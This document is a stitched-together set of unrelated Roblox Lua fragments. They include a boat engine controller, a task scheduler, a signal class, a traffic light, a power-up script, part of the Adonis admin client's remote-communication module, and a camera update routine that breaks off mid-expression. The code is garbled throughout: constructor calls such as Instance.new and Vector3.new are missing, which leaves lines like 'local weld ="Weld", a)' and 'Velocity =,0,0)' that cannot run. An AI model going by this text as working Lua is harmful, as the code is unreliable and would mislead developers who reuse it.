-- Variables
local player = game.Players.LocalPlayer local character = player.Character or player.CharacterAdded:Wait() local humanoid = character:WaitForChild("Humanoid")
local function weldBetween(a, b, weldName) local weld ="Weld", a) weld.Name = weldName weld.C0 = a.CFrame:inverse() * b.CFrame weld.Part0 = a weld.Part1 = b end ToggleEngineEvent.OnServerEvent:Connect(function(plr) -- Toggle Engine if not EngineOn and BoatControlActivated then EngineOn = true EngineOnVal.Value = true ToggleEngineEvent:FireClient(plr, EngineOn) MainPart.Main:Play() elseif EngineOn then ReducingSpeed = true EngineOn = false EngineOnVal.Value = false ToggleEngineEvent:FireClient(plr, EngineOn) if MainPart.Horn.isPlaying then MainPart.Horn:Pause() end MainPart.Main:Pause() for i = Thrust, 1, -1 do Thrust = Thrust - 1 ThrustVal.Value = Thrust local x,y,z = MainPart.BodyGyro.CFrame:ToOrientation() if not(x == 0) then MainPart.BodyGyro.CFrame = CFrame.fromOrientation((math.abs(x)/x)*(math.rad(Thrust/10)),y,math.rad(Thrust/25)) else MainPart.BodyGyro.CFrame = CFrame.fromOrientation(x,y,math.rad(Thrust/elevationAngle)) end if EngineOn then break end wait(.05) end MainPart.BodyVelocity.Velocity =,0,0) end ReducingSpeed = false end) SteerEvent.OnServerEvent:Connect(function(plr, steer) if steer == 1 and EngineOn then if not ReducingSpeed then if Thrust >= 0 then TurnAngle = -turnSpeed elseif Thrust < 0 then TurnAngle = turnSpeed end end local rot = CFrame.fromEulerAnglesXYZ(0,TurnAngle,0) MainPart.BodyGyro.CFrame = (rot*(MainPart.BodyGyro.CFrame-MainPart.BodyGyro.CFrame.p))+MainPart.BodyGyro.CFrame.p local x,y,z = MainPart.BodyGyro.CFrame:ToOrientation() MainPart.BodyGyro.CFrame = CFrame.fromOrientation(math.rad(Thrust/turnAngleDiv),y,z) elseif steer == -1 and EngineOn then if not ReducingSpeed then if Thrust >= 0 then TurnAngle = turnSpeed elseif Thrust < 0 then TurnAngle = -turnSpeed end end local rot = CFrame.fromEulerAnglesXYZ(0,TurnAngle,0) MainPart.BodyGyro.CFrame = (rot*(MainPart.BodyGyro.CFrame-MainPart.BodyGyro.CFrame.p))+MainPart.BodyGyro.CFrame.p local x,y,z = MainPart.BodyGyro.CFrame:ToOrientation() MainPart.BodyGyro.CFrame = CFrame.fromOrientation(math.rad(-Thrust/turnAngleDiv),y,z) elseif steer == 0 and EngineOn then TurnAngle = 0 local x,y,z = MainPart.BodyGyro.CFrame:ToOrientation() MainPart.BodyGyro.CFrame = CFrame.fromOrientation(0,y,z) end end) ThrottleEvent.OnServerEvent:Connect(function(plr, throttle) if neutral then neutral = false GearShiftSound:Play() end if throttle == 0 then neutral = true end Thrust = throttle local x,y,z = MainPart.BodyGyro.CFrame:ToOrientation() MainPart.BodyGyro.CFrame = CFrame.fromOrientation(x,y,math.rad(Thrust/100)) ThrustVal.Value = Thrust end) ToggleSoundEvent.OnServerEvent:Connect(function(plr,sound,val) if val then sound:Play() elseif not val then sound:Pause() end end) ThrustersEvent.OnServerEvent:Connect(function(plr,speed) if EngineOn and THRUSTERS_ENABLED then SideThrusterSpeed = speed end end) while wait() do if EngineOn or ReducingSpeed then MainPart.BodyVelocity.Velocity = (MainPart.CFrame.rightVector * (Thrust/speedDiv)) + (MainPart.CFrame.lookVector * SideThrusterSpeed) MainPart.Main.PlaybackSpeed = 1+ math.abs(Thrust/150) end end
--[[ Assert that our expectation value is truthy ]]
function Expectation:ok() local result = (self.value ~= nil) == self.successCondition local message = formatMessage(self.successCondition, ("Expected value %q to be non-nil"):format( tostring(self.value) ), ("Expected value %q to be nil"):format( tostring(self.value) ) ) assertLevel(result, message, 3) self:_resetModifiers() return self end
-- Everything below can be illustrated and tuned with the graph below. -- -- This includes everything, from the engines, to boost, to electric.
-- Helper function to lazily instantiate a controller if it does not yet exist, -- disable the active controller if it is different from the on being switched to, -- and then enable the requested controller. The argument to this function must be -- a reference to one of the control modules, i.e. Keyboard, Gamepad, etc.
function ControlModule:SwitchToController(controlModule) if not controlModule then if self.activeController then self.activeController:Enable(false) end self.activeController = nil self.activeControlModule = nil else if not self.controllers[controlModule] then self.controllers[controlModule] = end if self.activeController ~= self.controllers[controlModule] then if self.activeController then self.activeController:Enable(false) end self.activeController = self.controllers[controlModule] self.activeControlModule = controlModule -- Only used to check if controller switch is necessary if self.touchControlFrame and (self.activeControlModule == TouchThumbpad or self.activeControlModule == TouchThumbstick or self.activeControlModule == ClickToMove or self.activeControlModule == DynamicThumbstick) then if not self.controllers[TouchJump] then self.controllers[TouchJump] = end self.touchJumpController = self.controllers[TouchJump] self.touchJumpController:Enable(true, self.touchControlFrame) else if self.touchJumpController then self.touchJumpController:Enable(false) end end self:EnableActiveControlModule() end end end function ControlModule:OnLastInputTypeChanged(newLastInputType) if lastInputType == newLastInputType then warn("LastInputType Change listener called with current type.") end lastInputType = newLastInputType if lastInputType == Enum.UserInputType.Touch then -- TODO: Check if touch module already active local touchModule, success = self:SelectTouchModule() if success then while not self.touchControlFrame do wait() end self:SwitchToController(touchModule) end elseif computerInputTypeToModuleMap[lastInputType] ~= nil then local computerModule = self:SelectComputerMovementModule() if computerModule then self:SwitchToController(computerModule) end end end
-- print(hasAnyWater)
if hasAnyWater then if script.Parent.Parent.Charges.Value < 100 then script.Parent.Parent.Charges.Value = script.Parent.Parent.Charges.Value + 25 script.Parent.FillSound:stop() script.Parent.FillSound.Pitch = math.random(5,15) / 10 script.Parent.FillSound:play() end end end function alsowater(hit) if hit.Name:lower() == "water" then if script.Parent.Parent.Charges.Value < 100 then script.Parent.Parent.Charges.Value = script.Parent.Parent.Charges.Value + 50 script.Parent.FillSound:stop() script.Parent.FillSound.Pitch = math.random(5,15) / 10 script.Parent.FillSound:play() end end end script.Parent.Touched:connect(alsowater)
--[[ param targetFps Task scheduler won't run a task if it'd make the FPS drop below this amount (WARNING) this only holds true if it is used properly. If you try to complete 10 union operations at once in a single task then of course your FPS is going to drop -- queue the union operations up one at a time so the task scheduler can do its job. returns scheduler method Pause Pauses the scheduler so it won't run tasks. Tasks may still be added while the scheduler is paused. They just won't be touched until it's resumed. Performance efficient -- disables execution loop entirely until scheduler is resumed. method Resume Resumes the paused scheduler. method Destroy Destroys the scheduler so it can't be used anymore. method QueueTask Queues a task for automatic execution. param callback function (task) to be run. Example usage: local scheduler = TaskScheduler:CreateScheduler(60) local totalOperations = 0 local paused for i=1,100 do scheduler:QueueTask(function() local partA ="Part", workspace) local partB ="Part", workspace) plugin:Union({partA, partB}):Destroy() totalOperations = totalOperations + 1 print("Times unioned:", totalOperations) if (totalOperations == 50) then scheduler:Pause() paused = true end end) end repeat wait() until paused wait(2) scheduler:Resume() --]]
function TaskScheduler:CreateScheduler(targetFps) local scheduler = {} local queue = {} local sleeping = true local paused local updateFrameTableEvent = nil local start = tick() runService.RenderStepped:Wait() local function UpdateFrameTable() lastIteration = tick() for i = #frameUpdateTable,1,-1 do frameUpdateTable[i + 1] = ((frameUpdateTable[i] >= (lastIteration - 1)) and frameUpdateTable[i] or nil) end frameUpdateTable[1] = lastIteration end local function Loop() updateFrameTableEvent = runService.RenderStepped:Connect(UpdateFrameTable) while (true) do if (sleeping) then break end local fps = (((tick() - start) >= 1 and #frameUpdateTable) or (#frameUpdateTable / (tick() - start))) if (fps >= targetFps and (tick() - frameUpdateTable[1]) < (1 / targetFps)) then if (#queue > 0) then queue[1]() table.remove(queue, 1) else sleeping = true break end else runService.RenderStepped:Wait() end end updateFrameTableEvent:Disconnect() updateFrameTableEvent = nil end function scheduler.Pause(_s) paused = true sleeping = true end function scheduler.Resume(_s) if (paused) then paused = false sleeping = false Loop() end end function scheduler.Destroy(_s) scheduler:Pause() for i in pairs(scheduler) do scheduler[i] = nil end setmetatable(scheduler, { __index = function() error("Attempt to use destroyed scheduler") end; __newindex = function() error("Attempt to use destroyed scheduler") end; }) end function scheduler.QueueTask(_s, callback) queue[#queue + 1] = callback if (sleeping and not paused) then sleeping = false Loop() end end return scheduler end return TaskScheduler
--bendarobloxian 2020, Owner Title Script Version 4.1 | Now supporting rainbow colors
-- assume we are in the character, let's check
function sepuku() script.Parent = nil end local debris = game:GetService("Debris") local h = script.Parent:FindFirstChild("Humanoid") if (h == nil) then sepuku() end local torso = script.Parent:FindFirstChild("HumanoidRootPart") if (torso == nil) then sepuku() end local head = script.Parent:FindFirstChild("Head") if (head == nil) then head = torso end local equalizingForce = 236 / 1.2 -- amount of force required to levitate a mass local gravity = .75 -- things float at > 1 local fire ="Fire") fire.Parent = head fire.Heat = 10 fire.Size = 3 function recursiveGetLift(node) local m = 0 local c = node:GetChildren() if (node:FindFirstChild("Head") ~= nil) then head = node:FindFirstChild("Head") end -- nasty hack to detect when your parts get blown off for i=1,#c do if c[i].className == "Part" then if (head ~= nil and (c[i].Position - head.Position).magnitude < 10) then -- GROSS if c[i].Name == "Handle" then m = m + (c[i]:GetMass() * equalizingForce * 1) -- hack that makes hats weightless, so different hats don't change your jump height else m = m + (c[i]:GetMass() * equalizingForce * gravity) end end end m = m + recursiveGetLift(c[i]) end return m end function jumpIt() local mass = recursiveGetLift(h.Parent) local force ="BodyForce") force.force =,mass * 2,0) force.Parent = torso debris:AddItem(force,0.5) end local con = h.Jumping:connect(jumpIt) local oldSpeed = h.WalkSpeed h.WalkSpeed = h.WalkSpeed * 1.6 local oldMaxHealth = h.MaxHealth h.MaxHealth = oldMaxHealth * 1.5 h.Health = h.MaxHealth local bodySpin ="BodyAngularVelocity") bodySpin.P = 200000 bodySpin.angularvelocity =,15,0) bodySpin.maxTorque =,bodySpin.P,bodySpin.P) bodySpin.Parent = torso wait(30) fire:Destroy() h.WalkSpeed = oldSpeed h.MaxHealth = oldMaxHealth if h.Health > 60 then h.Health = 60 end con:disconnect() bodySpin:Destroy() sepuku()
--[=[ @within Matter :::info Topologically-aware function This function is only usable if called within the context of [`Loop:begin`](/api/Loop#begin). ::: Returns the `os.clock()` time delta between the start of this and last frame. ]=]
local function useDeltaTime(): number local state = topoRuntime.useFrameState() return state.deltaTime end return useDeltaTime
--Dynamic Traffic Light made by DerDiebKommt. Only edit the things that the script says to edit.
while true do --This makes the script do a loop. script.Parent.Green.PointLight.Enabled = false script.Parent.Yellow.PointLight.Enabled = false script.Parent.Red.PointLight.Enabled = true script.Parent.Green.Transparency = 0.5 script.Parent.Yellow.Transparency = 0.5 script.Parent.Red.Transparency = 0 wait(25) --Edit this if you want the time faster/slower for Green to go to Yellow. script.Parent.Green.PointLight.Enabled = true script.Parent.Yellow.PointLight.Enabled = false script.Parent.Red.PointLight.Enabled = false script.Parent.Green.Transparency = 0 script.Parent.Yellow.Transparency = 0.5 script.Parent.Red.Transparency = 0.5 wait(25) --Edit this if you want the time faster/slower for Yellow to go to Red. script.Parent.Green.PointLight.Enabled = false script.Parent.Yellow.PointLight.Enabled = true script.Parent.Red.PointLight.Enabled = false script.Parent.Green.Transparency = 0.5 script.Parent.Yellow.Transparency = 0 script.Parent.Red.Transparency = 0.5 wait(5) --Edit this if you want the time faster/slower for Red to go to Green. end --This makes the script do a loop.
function open() local mag = (doora.PrimaryPart.Position-script.Parent.Parent.Ahit.Position).magnitude for j = 0,1,speed/mag do local scf = doora.PrimaryPart.CFrame doora:SetPrimaryPartCFrame(scf:lerp(script.Parent.Parent.Ahit.CFrame,j)) wait() local magg = (doora.PrimaryPart.Position-script.Parent.Parent.Ahit.Position).magnitude if magg <= 0.1 then break end end end function close() local mag = (doora.PrimaryPart.Position-script.Parent.Parent.OrigAhit.Position).magnitude for j = 0,1,speed/mag do local scf = doora.PrimaryPart.CFrame doora:SetPrimaryPartCFrame(scf:lerp(script.Parent.Parent.OrigAhit.CFrame,j)) wait() local magg = (doora.PrimaryPart.Position-script.Parent.Parent.OrigAhit.Position).magnitude if magg <= 0.1 then break end end doora:SetPrimaryPartCFrame(doora.PrimaryPart.CFrame:lerp(script.Parent.Parent.OrigAhit.CFrame)) end
local Signal = {} Signal.__index = Signal function local self = setmetatable({ _bindable ="BindableEvent"); _connections = {}; _args = {}; _threads = 0; _id = 0; }, Signal) if (maid) then maid:GiveTask(self) end return self end function Signal.Proxy(rbxScriptSignal, maid) assert(typeof(rbxScriptSignal) == "RBXScriptSignal", "Argument #1 must be of type RBXScriptSignal") local signal = signal:_setProxy(rbxScriptSignal) return signal end function Signal.Is(obj) return (type(obj) == "table" and getmetatable(obj) == Signal) end function Signal:_setProxy(rbxScriptSignal) assert(typeof(rbxScriptSignal) == "RBXScriptSignal", "Argument #1 must be of type RBXScriptSignal") self:_clearProxy() self._proxyHandle = rbxScriptSignal:Connect(function(...) self:Fire(...) end) end function Signal:_clearProxy() if (self._proxyHandle) then self._proxyHandle:Disconnect() self._proxyHandle = nil end end function Signal:Fire(...) local totalListeners = (#self._connections + self._threads) if (totalListeners == 0) then return end local id = self._id self._id += 1 self._args[id] = {totalListeners, {n = select("#", ...), ...}} self._threads = 0 self._bindable:Fire(id) end function Signal:Wait() self._threads += 1 local id = self._bindable.Event:Wait() local args = self._args[id] args[1] -= 1 if (args[1] <= 0) then self._args[id] = nil end return table.unpack(args[2], 1, args[2].n) end function Signal:WaitPromise() return resolve(self:Wait()) end) end function Signal:Connect(handler) local connection =, self._bindable.Event:Connect(function(id) local args = self._args[id] args[1] -= 1 if (args[1] <= 0) then self._args[id] = nil end handler(table.unpack(args[2], 1, args[2].n)) end)) table.insert(self._connections, connection) return connection end function Signal:DisconnectAll() for _,c in ipairs(self._connections) do if (c._conn) then c._conn:Disconnect() end end self._connections = {} self._args = {} end function Signal:Destroy() self:DisconnectAll() self:_clearProxy() self._bindable:Destroy() end return Signal
-- Resizes a model to the specified scale
local function scaleModel(model, scale) local primary = model.PrimaryPart local primaryCf = primary.CFrame for _,v in pairs(model:GetDescendants()) do if (v:IsA("BasePart")) then v.Size = (v.Size * scale) if (v ~= primary) then v.CFrame = (primaryCf + (primaryCf:inverse() * v.Position * scale)) end end end return model end
--// Remote
return function() local _G, game, script, getfenv, setfenv, workspace, getmetatable, setmetatable, loadstring, coroutine, rawequal, typeof, print, math, warn, error, pcall, xpcall, select, rawset, rawget, ipairs, pairs, next, Rect, Axes, os, time, Faces, unpack, string, Color3, newproxy, tostring, tonumber, Instance, TweenInfo, BrickColor, NumberRange, ColorSequence, NumberSequence, ColorSequenceKeypoint, NumberSequenceKeypoint, PhysicalProperties, Region3int16, Vector3int16, require, table, type, wait, Enum, UDim, UDim2, Vector2, Vector3, Region3, CFrame, Ray, delay = _G, game, script, getfenv, setfenv, workspace, getmetatable, setmetatable, loadstring, coroutine, rawequal, typeof, print, math, warn, error, pcall, xpcall, select, rawset, rawget, ipairs, pairs, next, Rect, Axes, os, time, Faces, unpack, string, Color3, newproxy, tostring, tonumber, Instance, TweenInfo, BrickColor, NumberRange, ColorSequence, NumberSequence, ColorSequenceKeypoint, NumberSequenceKeypoint, PhysicalProperties, Region3int16, Vector3int16, require, table, type, wait, Enum, UDim, UDim2, Vector2, Vector3, Region3, CFrame, Ray, delay local script = script local service = service local client = client local Anti, Core, Functions, Process, Remote, UI, Variables local function Init() UI = client.UI; Anti = client.Anti; Core = client.Core; Variables = client.Variables Functions = client.Functions; Process = client.Process; Remote = client.Remote; Remote.Init = nil; end local function RunAfterLoaded() --// Report client finished loading log("~! Fire client loaded") client.Remote.Send("ClientLoaded") --// Ping loop log("~! Start ClientCheck loop"); delay(5, function() service.StartLoop("ClientCheck", 30, Remote.CheckClient, true) end) --// Get settings log("Get settings"); local settings = client.Remote.Get("Setting",{"G_API","Allowed_API_Calls","HelpButtonImage"}) if settings then client.G_API = settings.G_API --client.G_Access = settings.G_Access --client.G_Access_Key = settings.G_Access_Key --client.G_Access_Perms = settings.G_Access_Perms client.Allowed_API_Calls = settings.Allowed_API_Calls client.HelpButtonImage = settings.HelpButtonImage else log("~! GET SETTINGS FAILED?") warn("FAILED TO GET SETTINGS FROM SERVER"); end Remote.RunAfterLoaded = nil; end local function RunLast() --[[client = service.ReadOnly(client, { [client.Variables] = true; [client.Handlers] = true; G_API = true; G_Access = true; G_Access_Key = true; G_Access_Perms = true; Allowed_API_Calls = true; HelpButtonImage = true; Finish_Loading = true; RemoteEvent = true; ScriptCache = true; Returns = true; PendingReturns = true; EncodeCache = true; DecodeCache = true; Received = true; Sent = true; Service = true; Holder = true; GUIs = true; LastUpdate = true; RateLimits = true; Init = true; RunLast = true; RunAfterInit = true; RunAfterLoaded = true; RunAfterPlugins = true; }, true)--]] Remote.RunLast = nil; end getfenv().client = nil getfenv().service = nil getfenv().script = nil client.Remote = { Init = Init; RunLast = RunLast; RunAfterLoaded = RunAfterLoaded; Returns = {}; PendingReturns = {}; EncodeCache = {}; DecodeCache = {}; Received = 0; Sent = 0; CheckClient = function() if os.time() - Core.LastUpdate >= 10 then Remote.Send("ClientCheck", { Sent = Remote.Sent or 0; Received = Remote.Received; }, client.DepsName) end end; Returnables = { Test = function(args) return "HELLO FROM THE CLIENT SIDE :)! ", unpack(args) end; Ping = function(args) return Remote.Ping() end; ClientHooked = function(args) return Core.Special end; TaskManager = function(args) local action = args[1] if action == "GetTasks" then local tab = {} for i,v in next,service.GetTasks() do local new = {} new.Status = v.Status new.Name = v.Name new.Index = v.Index new.Created = v.Created new.CurrentTime = os.time() new.Function = tostring(v.Function) table.insert(tab,new) end return tab end end; LoadCode = function(args) local code = args[1] local func = Core.LoadCode(code, GetEnv()) if func then return func() end end; Function = function(args) local func = client.Functions[args[1]] if func and type(func) == "function" then return func(unpack(args, 2)) end end; Handler = function(args) local handler = client.Handlers[args[1]] if handler and type(handler) == "function" then return handler(unpack(args, 2)) end end; UIKeepAlive = function(args) if Variables.UIKeepAlive then for ind,g in next,client.GUIs do if g.KeepAlive then if g.Class == "ScreenGui" or g.Class == "GuiMain" then g.Object.Parent = service.Player.PlayerGui elseif g.Class == "TextLabel" then g.Object.Parent = UI.GetHolder() end g.KeepAlive = false end end end return true; end; UI = function(args) local guiName = args[1] local themeData = args[2] local guiData = args[3] Variables.LastServerTheme = themeData or Variables.LastServerTheme; return UI.Make(guiName, guiData, themeData) end; InstanceList = function(args) local objects = service.GetAdonisObjects() local temp = {} for i,v in pairs(objects) do table.insert(temp, { Text = v:GetFullName(); Desc = v.ClassName; }) end return temp end; ClientLog = function(args) local temp={} local function toTab(str, desc, color) for i,v in next,service.ExtractLines(str) do table.insert(temp, {Text = v; Desc = desc..v; Color = color;}) end end for i,v in next,service.LogService:GetLogHistory() do local mType = v.messageType toTab(v.message, (mType == Enum.MessageType.MessageWarning and "Warning" or mType == Enum.MessageType.MessageInfo and "Info" or mType == Enum.MessageType.MessageError and "Error" or "Output").." - ", mType == Enum.MessageType.MessageWarning and, 0.733333, 0.0509804) or mType == Enum.MessageType.MessageInfo and, 0.305882, 1) or mType == Enum.MessageType.MessageError and, 0.196078, 0.054902)) end return temp end; LocallyFormattedTime = function(args) if type(args[1]) == "table" then local results = {} for i, t in ipairs(args[1]) do results[i] = service.FormatTime(t, select(2, unpack(args))) end return results end return service.FormatTime(unpack(args)) end; }; UnEncrypted = { LightingChange = function(prop, val) print(prop, "TICKLE ME!?") Variables.LightingChanged = true service.Lighting[prop] = val Anti.LastChanges.Lighting = prop wait(.1) Variables.LightingChanged = false print("TICKLED :)",Variables.LightingChanged) if Anti.LastChanges.Lighting == prop then Anti.LastChanges.Lighting = nil end end }; Commands = { GetReturn = function(args) print("THE SERVER IS ASKING US FOR A RETURN"); local com = args[1] local key = args[2] local parms = {unpack(args, 3)} local retfunc = Remote.Returnables[com] local retable = (retfunc and {pcall(retfunc,parms)}) or {} if retable[1] ~= true then logError(retable[2]) Remote.Send("GiveReturn", key, "__ADONIS_RETURN_ERROR", retable[2]) else print("SENT RETURN"); Remote.Send("GiveReturn", key, unpack(retable,2)) end end; GiveReturn = function(args) print("SERVER GAVE US A RETURN") if Remote.PendingReturns[args[1]] then print("VALID PENDING RETURN") Remote.PendingReturns[args[1]] = nil service.Events[args[1]]:Fire(unpack(args, 2)) end end; SessionData = function(args) local sessionKey = args[1]; if sessionKey then service.Events.SessionData:Fire(sessionKey, table.unpack(args, 2)) end end; SetVariables = function(args) local vars = args[1] for var, val in pairs(vars) do Variables[var] = val end end; Print = function(args) print(unpack(args)) end; FireEvent = function(args) service.FireEvent(unpack(args)) end; Test = function(args) print("OK WE GOT COMMUNICATION! ORGL: "..tostring(args[1])) end; TestError = function(args) error("THIS IS A TEST ERROR") end; TestEvent = function(args) Remote.PlayerEvent(args[1],unpack(args,2)) end; LoadCode = function(args) local code = args[1] local func = Core.LoadCode(code, GetEnv()) if func then return func() end end; LaunchAnti = function(args) Anti.Launch(args[1],args[2]) end; UI = function(args) local guiName = args[1] local themeData = args[2] local guiData = args[3] Variables.LastServerTheme = themeData or Variables.LastServerTheme; UI.Make(guiName,guiData,themeData) end; RemoveUI = function(args) UI.Remove(args[1],args[2]) end; RefreshUI = function(args) local guiName = args[1] local ignore = args[2] UI.Remove(guiName,ignore) local themeData = args[3] local guiData = args[4] Variables.LastServerTheme = themeData or Variables.LastServerTheme; UI.Make(guiName,guiData,themeData) end; StartLoop = function(args) local name = args[1] local delay = args[2] local code = args[3] local func = Core.LoadCode(code, GetEnv()) if name and delay and code and func then service.StartLoop(name,delay,func) end end; StopLoop = function(args) service.StopLoop(args[1]) end; Function = function(args) local func = client.Functions[args[1]] if func and type(func) == "function" then Pcall(func,unpack(args,2)) end end; Handler = function(args) local handler = client.Handlers[args[1]] if handler and type(handler) == "function" then Pcall(handler, unpack(args, 2)) end end; }; Fire = function(...) local limits = Process.RateLimits local limit = (limits and limits.Remote) or 0.01; local RemoteEvent = Core.RemoteEvent; local extra = {...}; if RemoteEvent and RemoteEvent.Object then service.Queue("REMOTE_SEND", function() Remote.Sent = Remote.Sent+1; RemoteEvent.Object:FireServer({Mode = "Fire", Module = client.Module, Loader = client.Loader, Sent = Remote.Sent, Received = Remote.Received}, unpack(extra)); wait(limit); end) end end; Send = function(com,...) Core.LastUpdate = os.time() Remote.Fire(Remote.Encrypt(com,Core.Key),...) end; GetFire = function(...) local RemoteEvent = Core.RemoteEvent; local limits = Process.RateLimits; local limit = (limits and limits.Remote) or 0.02; local extra = {...}; local returns; if RemoteEvent and RemoteEvent.Function then local Yield = service.Yield(); service.Queue("REMOTE_SEND", function() Remote.Sent = Remote.Sent+1; delay(0, function() -- Wait for return in new thread; We don't want to hold the entire fire queue up while waiting for one thing to return since we just want to limit fire speed; returns = { RemoteEvent.Function:InvokeServer({ Mode = "Get", Module = client.Module, Loader = client.Loader, Sent = Remote.Sent, Received = Remote.Received }, unpack(extra)) } Yield:Release(returns); end) wait(limit) end) if not returns then Yield:Wait(); end Yield:Destroy(); if returns then return unpack(returns) end end end; RawGet = function(...) local extra = {...}; local RemoteEvent = Core.RemoteEvent; if RemoteEvent and RemoteEvent.Function then Remote.Sent = Remote.Sent+1; return RemoteEvent.Function:InvokeServer({Mode = "Get", Module = client.Module, Loader = client.Loader, Sent = Remote.Sent, Received = Remote.Received}, unpack(extra)); end end; Get = function(com,...) Core.LastUpdate = os.time() local ret = Remote.GetFire(Remote.Encrypt(com,Core.Key),...) if type(ret) == "table" then return unpack(ret); else return ret; end end; OldGet = function(com,...) local returns local key = Functions:GetRandom() local waiter = service.New("BindableEvent"); local event = service.Events[key]:Connect(function(...) print("WE ARE GETTING A RETURN!") returns = {...} waiter:Fire() wait() waiter:Fire() waiter:Destroy() end) Remote.PendingReturns[key] = true Remote.Send("GetReturn",com,key,...) print(string.format("GETTING RETURNS? %s", tostring(returns))) --returns = returns or {event:Wait()} waiter.Event:Wait(); print(string.format("WE GOT IT! %s", tostring(returns))) event:Disconnect() if returns then if returns[1] == "__ADONIS_RETURN_ERROR" then error(returns[2]) else return unpack(returns) end else return nil end end; Ping = function() local t = time() local ping = Remote.Get("Ping") if not ping then return false end local t2 = time() local mult = 10^3 local ms = ((math.floor((t2-t)*mult+0.5)/mult)*1000) return ms end; PlayerEvent = function(event,...) Remote.Send("PlayerEvent",event,...) end; Encrypt = function(str, key, cache) cache = cache or Remote.EncodeCache or {} if not key or not str then return str elseif cache[key] and cache[key][str] then return cache[key][str] else local byte = string.byte local sub = string.sub local char = string.char local keyCache = cache[key] or {} local endStr = {} for i = 1, #str do local keyPos = (i % #key) + 1 endStr[i] = char(((byte(sub(str, i, i)) + byte(sub(key, keyPos, keyPos)))%126) + 1) end endStr = table.concat(endStr) cache[key] = keyCache keyCache[str] = endStr return endStr end end; Decrypt = function(str, key, cache) cache = cache or Remote.DecodeCache or {} if not key or not str then return str elseif cache[key] and cache[key][str] then return cache[key][str] else local keyCache = cache[key] or {} local byte = string.byte local sub = string.sub local char = string.char local endStr = {} for i = 1, #str do local keyPos = (i % #key)+1 endStr[i] = char(((byte(sub(str, i, i)) - byte(sub(key, keyPos, keyPos)))%126) - 1) end endStr = table.concat(endStr) cache[key] = keyCache keyCache[str] = endStr return endStr end end; } end
-- Movement mode standardized to Enum.ComputerCameraMovementMode values
function ClassicCamera:SetCameraMovementMode( cameraMovementMode ) BaseCamera.SetCameraMovementMode(self,cameraMovementMode) self.isFollowCamera = cameraMovementMode == Enum.ComputerCameraMovementMode.Follow end function ClassicCamera:Test() print("ClassicCamera:Test()") end function ClassicCamera:GetCameraSubjectOffset() if self:IsInFirstPerson() then return, 0, 0) elseif self.portraitMode then return PORTRAIT_OFFSET elseif self.isSmallTouchScreen then return MOBILE_OFFSET end return, 0, 0) end function ClassicCamera:Update() local now = tick() local timeDelta = (now - self.lastUpdate) local camera = workspace.CurrentCamera local newCameraCFrame = camera.CFrame local newCameraFocus = camera.Focus local overrideCameraLookVector = nil if FFlagUserNewDefaultCameraAngle and self.resetCameraAngle then local rootPart = self:GetHumanoidRootPart() if rootPart then overrideCameraLookVector = (rootPart.CFrame * INITIAL_CAMERA_ANGLE).lookVector else overrideCameraLookVector = INITIAL_CAMERA_ANGLE.lookVector end self.resetCameraAngle = false end local player = PlayersService.LocalPlayer local humanoid = self:GetHumanoid() local cameraSubject = camera.CameraSubject local isInVehicle = cameraSubject and cameraSubject:IsA('VehicleSeat') local isOnASkateboard = cameraSubject and cameraSubject:IsA('SkateboardPlatform') local isClimbing = humanoid and humanoid:GetState() == Enum.HumanoidStateType.Climbing if self.lastUpdate == nil or timeDelta > 1 then self.lastCameraTransform = nil end if self.lastUpdate then local gamepadRotation = self:UpdateGamepad() if self:ShouldUseVRRotation() then self.rotateInput = self.rotateInput + self:GetVRRotationInput() else -- Cap out the delta to 0.1 so we don't get some crazy things when we re-resume from local delta = math.min(0.1, timeDelta) if gamepadRotation ~= ZERO_VECTOR2 then self.rotateInput = self.rotateInput + (gamepadRotation * delta) end local angle = 0 if not (isInVehicle or isOnASkateboard) then angle = angle + (self.turningLeft and -120 or 0) angle = angle + (self.turningRight and 120 or 0) end if angle ~= 0 then self.rotateInput = self.rotateInput + * delta), 0) end end end -- Reset tween speed if user is panning if self.userPanningTheCamera then tweenSpeed = 0 self.lastUserPanCamera = tick() end local userRecentlyPannedCamera = now - self.lastUserPanCamera < TIME_BEFORE_AUTO_ROTATE local subjectPosition = self:GetSubjectPosition() if subjectPosition and player and camera then local zoom = self:GetCameraToSubjectDistance() if zoom < 0.5 then zoom = 0.5 end if self:GetIsMouseLocked() and not self:IsInFirstPerson() then -- We need to use the right vector of the camera after rotation, not before local newLookCFrame = self:CalculateNewLookCFrame(overrideCameraLookVector) local offset = self:GetMouseLockOffset() local cameraRelativeOffset = offset.X * newLookCFrame.rightVector + offset.Y * newLookCFrame.upVector + offset.Z * newLookCFrame.lookVector --offset can be NAN, NAN, NAN if newLookVector has only y component if Util.IsFiniteVector3(cameraRelativeOffset) then subjectPosition = subjectPosition + cameraRelativeOffset end else if not self.userPanningTheCamera and self.lastCameraTransform then local isInFirstPerson = self:IsInFirstPerson() if (isInVehicle or isOnASkateboard or (self.isFollowCamera and isClimbing)) and self.lastUpdate and humanoid and humanoid.Torso then if isInFirstPerson then if self.lastSubjectCFrame and (isInVehicle or isOnASkateboard) and cameraSubject:IsA('BasePart') then local y = -Util.GetAngleBetweenXZVectors(self.lastSubjectCFrame.lookVector, cameraSubject.CFrame.lookVector) if Util.IsFinite(y) then self.rotateInput = self.rotateInput +, 0) end tweenSpeed = 0 end elseif not userRecentlyPannedCamera then local forwardVector = humanoid.Torso.CFrame.lookVector if isOnASkateboard then forwardVector = cameraSubject.CFrame.lookVector end tweenSpeed = Util.Clamp(0, tweenMaxSpeed, tweenSpeed + tweenAcceleration * timeDelta) local percent = Util.Clamp(0, 1, tweenSpeed * timeDelta) if self:IsInFirstPerson() and not (self.isFollowCamera and self.isClimbing) then percent = 1 end local y = Util.GetAngleBetweenXZVectors(forwardVector, self:GetCameraLookVector()) if Util.IsFinite(y) and math.abs(y) > 0.0001 then self.rotateInput = self.rotateInput + * percent, 0) end end elseif self.isFollowCamera and (not (isInFirstPerson or userRecentlyPannedCamera) and not VRService.VREnabled) then -- Logic that was unique to the old FollowCamera module local lastVec = -(self.lastCameraTransform.p - subjectPosition) local y = Util.GetAngleBetweenXZVectors(lastVec, self:GetCameraLookVector()) -- This cutoff is to decide if the humanoid's angle of movement, -- relative to the camera's look vector, is enough that -- we want the camera to be following them. The point is to provide -- a sizable dead zone to allow more precise forward movements. local thetaCutoff = 0.4 -- Check for NaNs if Util.IsFinite(y) and math.abs(y) > 0.0001 and math.abs(y) > thetaCutoff * timeDelta then self.rotateInput = self.rotateInput +, 0) end end end end if not self.isFollowCamera then local VREnabled = VRService.VREnabled if FFlagUserNewDefaultCameraAngle then if VREnabled then newCameraFocus = self:GetVRFocus(subjectPosition, timeDelta) else newCameraFocus = + self:GetCameraSubjectOffset()) end else newCameraFocus = VREnabled and 